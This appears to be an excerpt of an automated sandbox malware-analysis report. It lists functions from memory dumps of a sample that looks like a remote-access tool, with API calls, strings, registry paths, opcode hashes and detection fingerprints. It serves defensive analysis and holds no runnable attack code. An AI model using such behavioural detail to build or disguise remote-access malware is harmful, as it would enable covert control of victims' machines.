                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strtok$Sleep
                                                                                      • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                      • API String ID: 2009458258-3774545468
                                                                                      • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                      • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                      • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                      • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                      Function 6C5D8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C5E67B5), ref: 6C5D8D6B
                                                                                        • Part of subcall function 6C5D4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 6C5D8DCB
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C5D8DD8
                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C5D8EBF
                                                                                        • Part of subcall function 6C5D4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
                                                                                        • Part of subcall function 6C5D4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE
                                                                                        • Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
                                                                                        • Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
                                                                                        • Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                      • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                      • API String ID: 2714439535-3484705551
                                                                                      • Opcode ID: 4cf3bd0c25f9ad74d08b03a31845362a29c878ce4c4754483fc4e2a54ef80a82
                                                                                      • Instruction ID: c644692432763445050495b9ad518f0df96245a93c3a5760e687270a25a5ba2d
                                                                                      • Opcode Fuzzy Hash: 4cf3bd0c25f9ad74d08b03a31845362a29c878ce4c4754483fc4e2a54ef80a82
                                                                                      • Instruction Fuzzy Hash: 0B41D871A00319AFDB10DB5E9C85BEA7378EB45706F0104A6EA15D6E40E770AE44CFA9
                                                                                      Function 11102C50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                      • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                      • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                      • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                      • GetLastError.KERNEL32 ref: 11102CB1
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                      • GetLastError.KERNEL32 ref: 11102CCF
                                                                                      Strings
                                                                                      • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                      • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                      • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                      • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                      • API String ID: 2036220054-60805735
                                                                                      • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                      • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                      • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                      • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                      Function 1115E380 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                      • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                      • wsprintfA.USER32 ref: 1115E3C8
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                      • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                      • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                      • API String ID: 1734919802-1728070458
                                                                                      • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                      • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                      • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                      • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                      Function 111100D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1111013A
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                      • API String ID: 1976012330-1024648535
                                                                                      • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                      • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                      • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                      • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                      Function 1115BA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,A1BC2D8B,00000000,?), ref: 1115BA67
                                                                                      • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                      • wsprintfW.USER32 ref: 1115BAA7
                                                                                      • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                      • wsprintfW.USER32 ref: 1115BB67
                                                                                      • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                      • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                      • API String ID: 3050498177-823534439
                                                                                      • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                      • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                      • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                      • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                      Function 6C5E2F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _calloc.LIBCMT ref: 6C5E2FBB
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E300D
                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 6C5E301B
                                                                                      • _calloc.LIBCMT ref: 6C5E303B
                                                                                      • _memmove.LIBCMT ref: 6C5E3049
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 6C5E307F
                                                                                      • SetEvent.KERNEL32(00000318,?,?,?,?,?,?,?,?,?,?,?,?,?,?,939E34B3), ref: 6C5E308C
                                                                                        • Part of subcall function 6C5E28D0: wsprintfA.USER32 ref: 6C5E2965
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                      • String ID: a3^l$a3^l
                                                                                      • API String ID: 3178096747-1531287518
                                                                                      • Opcode ID: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
                                                                                      • Instruction ID: b07ff557ca466e130170c4e88f318dbd3eb09bff7e07ea863bff7de938e3be89
                                                                                      • Opcode Fuzzy Hash: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
                                                                                      • Instruction Fuzzy Hash: D34166B5D00209AFDB00DFA9CC45AEFB7B8EB8C305F00851AE515E7640E771AA058BA1
                                                                                      Function 6C5F0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C5F0F2B,6E272756,00000000,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D48
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C5F0D5B
                                                                                      • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C61CB4C,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D76
                                                                                      • _malloc.LIBCMT ref: 6C5F0D8C
                                                                                        • Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
                                                                                        • Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
                                                                                        • Part of subcall function 6C5F1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE
                                                                                      • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?), ref: 6C5F0D9F
                                                                                      • _free.LIBCMT ref: 6C5F0D84
                                                                                        • Part of subcall function 6C5F1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C5F1C13
                                                                                        • Part of subcall function 6C5F1BFD: GetLastError.KERNEL32(00000000), ref: 6C5F1C25
                                                                                      • _free.LIBCMT ref: 6C5F0DAF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AdaptersAddressesHeap_free$AddressAllocErrorFreeLastLibraryLoadProc_malloc
                                                                                      • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                      • API String ID: 3205077458-1843585929
                                                                                      • Opcode ID: f7d7d0567c885f62fea874b15115aee20e00d0644c9aa3f9200b4ec4794edaa5
                                                                                      • Instruction ID: 5f63a6c4c531cfa2697ff8420c0a1c5ae77eb827c9b6ee89afed28c04b5278e4
                                                                                      • Opcode Fuzzy Hash: f7d7d0567c885f62fea874b15115aee20e00d0644c9aa3f9200b4ec4794edaa5
                                                                                      • Instruction Fuzzy Hash: 0001D4F5200341ABE7289B759C85F5776A89B80B05F24482DF566CBA80EB71F846CB64
                                                                                      Function 11145440 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                        • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                      • _memset.LIBCMT ref: 11145485
                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                      • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                      • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                      • API String ID: 4251163631-545709139
                                                                                      • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                      • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                      • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                      • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                      Function 11015010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 110150CA
                                                                                      • _memset.LIBCMT ref: 1101510E
                                                                                      • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                      Strings
                                                                                      • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                      • %012d, xrefs: 110150C4
                                                                                      • PackedCatalogItem, xrefs: 11015132
                                                                                      • NSLSP, xrefs: 11015158
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
